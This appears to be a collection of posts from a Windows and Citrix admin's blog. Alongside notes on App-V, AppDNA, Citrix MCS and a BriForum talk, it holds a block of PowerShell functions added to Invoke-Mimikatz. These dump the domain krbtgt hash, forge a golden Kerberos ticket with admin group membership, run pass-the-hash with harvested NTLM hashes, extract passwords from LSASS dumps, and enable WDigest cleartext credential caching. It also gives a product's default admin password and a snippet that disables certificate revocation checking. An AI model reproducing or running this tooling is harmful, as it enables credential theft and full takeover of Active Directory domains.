With the new windows 10 version in place, App-V is integrated into the operating system. Probably you wonder what will happen to machine that gets an inplace upgrade with an installed App-V Client?

The cache stays and the App-V application gets uninstalled and the App-V feature gets enabled. So it should be a flawless migration from Windows 10 – 1511 with a current App-V Client to Windows 10-1607.

This is more a reminder for myself

You can disable certificate revocate checking by adding these lines to the application xml file

  <runtime>
    <generatePublisherEvidence enabled="false" />
  </runtime>

one of the main security issues with windows is pass the hash. I added some functions to the Mimikatz Powershell script that can be found here.

 

The functions that make the usage of mimikatz more easy. Just add these functions to the end of the mimikatz script and launch the script. Then the functions are in memory and available functions will be shown.

Function Global:invoke-mimiDom {
    if (Test-path „$ScriptPath\mimi_dom.log“) {
    $MimiUser =“didi44″
    write-host $scriptpath -foregroundcolor green
    $global:mimidata = Get-Content „$ScriptPath\mimi_dom.log“
    Foreach ($line in $mimidata){
    if ($line -match „aes256_hmac“) {$global:aes = $($line.split(„:“)[1]).trim()}
    if ($line -match „Domain :“) {$global:domSid = $($line.split(„/“)[1]).trim()}
    if ($line -match „Default Salt :“) {$global:domain = $($($line.split(„:“)[1]).trim()).replace(„krbtgt“,““)}

}
    $FullCMD= „kerberos::golden /domain:“ + $domain  + “ /sid:“ + $domsid + “ /aes256:“ + $aes + “ /user:“ + $mimiUser + “ /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi“
    Write-host $fullcmd
    invoke-mimikatz -command „privilege::debug kerberos::purge `“$fullcmd`“ `“kerberos::ptt forged.kirbi`“ misc::cmd“
    } ELSE {
        Write-host „there is no mimi_dom.log, please run first invoke-mimiexportdom  on a domain controller“ -foregroundcolor red
    }

}

Function Global:invoke-mimiStd {
$global:mimi_tmp  = Invoke-Mimikatz
$mimi_TMP | Out-File „$ScriptPath\mimi.log“
$global:mimi = Get-Content „$ScriptPath\mimi.log“
foreach ($line in $mimi){
        $number++
        if ($line -match „\* Username : Administrator“){
            $Global:mimiUsername1 = $($line.split(„:“)[1]).trim()
            $Global:mimiDom1 = $($mimi[$number].split(„:“)[1]).trim()
            $Global:mimiHash1 = $($mimi[$number+1].split(„:“)[1]).trim()
            break
        }
    }
Write-host „$mimiusername1 $mimiDom1 $mimihash1“
}

FUNCTION Global:invoke-MimiExportDom {
if (!(test-path „$scriptpath\mimi_dom.log“)){
    $global:mimi_dom_tmp = Invoke-mimikatz -command „privilege::debug `“lsadump::lsa /inject /name:krbtgt`““
    $global:mimi_dom_tmp | Out-File „$scriptpath\mimi_dom.log“
    $global:mimi_dom = get-content „$ScriptPath\mimi_dom.log“
}
}

FUNCTION Global:Invoke-mimiDMP {
$dmps = get-childitem „$scriptpath\*.dmp“
foreach ($dmp in $dmps) {
    Write-host „analysing $dmp“ -foregroundcolor green
    $global:mimi = invoke-mimikatz -command „privilege::debug `“sekurlsa::minidump $dmp`“ sekurlsa::logonpasswords“
    }
    Write-host $mimi
}

FUNCTION Global:Invoke-mimicmd {
    If ($mimiUsername1 -lt 1){
        Write-host „please run first invoke-mimiSTD“ -foregroundcolor red}
    ELSE {
        $command =  „privilege::debug `“sekurlsa::pth /user:“ + $mimiUsername1 + “ /domain:“+ $mimiDom1 + “ /ntlm:“ + $mimiHash1 +“ /run:cmd`““
        write-host „$command“
        $global:mimi = invoke-mimikatz -command $command
    }
}

 

#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

If ($( get-itemproperty HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest\).uselogoncredential -ne 1){
    reg add HKLM\system\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t Reg_DWORD /d 1
    Write-host „changed security provider – to see passeword in cleartext logoff and log on again“ -ForegroundColor Yellow
    }

Write-host „the following functions are available:“
write-host „invoke-mimiStd“ -foregroundcolor green
write-host „invoke-mimiExportDom“ -foregroundcolor green
write-host „invoke-mimiDom“ -foregroundcolor green
write-host „invoke-mimiDmp“ -foregroundcolor green
write-host „invoke-mimiCMD“ -foregroundcolor green

After the first installation of AppDNA the default username to log on is

Administrator with the password apps3cur3

The problem is that this did not work for me. I was logged in with a domain admin account also with the name administrator and it seemed AppDNA always tried to log me in with this account.

After I changed the AppDNA username Administrator to Admin1 in the database I could successfully log in

I had a discussion with a colleague yesterday about what is happening with Citrix on a long term. My answer was Microsoft will buy them! Why? There are multiple small pieces that if you put them together the picture might look like that

1. the new Citrix CEO Kirill Tatrinov was originally working for Microsoft. Did you heard already anything from him? I did not hear any noise except that his Synergy keynote was not very well received. Maybe he is not really interested in keynotes because he is preparing something else?

2. Citrix sold all departments, that are totally not interesting for Microsoft like the whole online stuff. Microsoft already has products in this area that would compete with this – like skype for business vs gotomeeting.

3. Microsoft retired TMG – so they have nothing at the endpoint to the internet – their new strategy is cloud first, mobile first – would not netscaler fit perfectly?

4. Server 2016 has not much additional features announced for RDSH, it is an optimized gateway that host more users (indeed I heard they found a bug), multipoint server, OpenGL Support. That’s pretty it – so probably they just don’t develop that much anymore.

5. ARA – Azure Remote App is lacking management for larger environments – the citrix cloud products allow this (they anyhow already run on Azure)

So – I am curious what will happen in future!

I am right now working with the insider preview Redstone 1. A very interesting feature is, that App-V and UEV is included in the product.

You can just enable them via a powershell command enable-appv or enable-uev!

I was lately at a customer where we had some weird behavior so we checked all kind of stuff and realized, that all machines had the same sid. From my perspective this should not be an issue since Mark Russinovich released this article. The only issues persists, if two domain controllers have the same SID.

Then I checked with a couple of colleagues how it is in their environment, that is running smooth – and – all SIDs were the same. So it seems to be standard, that MCS is not changing the SID.

Another issue we found, is that MCS created always full clones on a VMWare based environment. This should only happen in a XenServer environment. The problem is, that the customer only had Terminal Server and not VDI. And MCS in combination with terminal Server images has no choice how the VMs should be deployed. If you look into in Citrix Studio for the powershell command, you can see, that the machines are created as full clone. Saying that it means, that if you want linked clones you cannot use the console but need to use a powershell script.

hi guys,

I am happy that I will attend brofurum london as a speaker on 19-20. mai 2016.

I will speak about how people might have attacked your domain by using the pass the hash method. From my believing most domains should be “infected” because it is ridiculous easy. Hope to see you on briforum. More content I will release here after my presentation. Attached a tool that I might use – please do not use this tool on your Computers!!!!

Test tool for my presentation

Project contennial is finally live. With the newest Windows 10 built 10.0.14316.0 you can use it and publsih win 32 bit Application via the appstore.

it can be downloaded here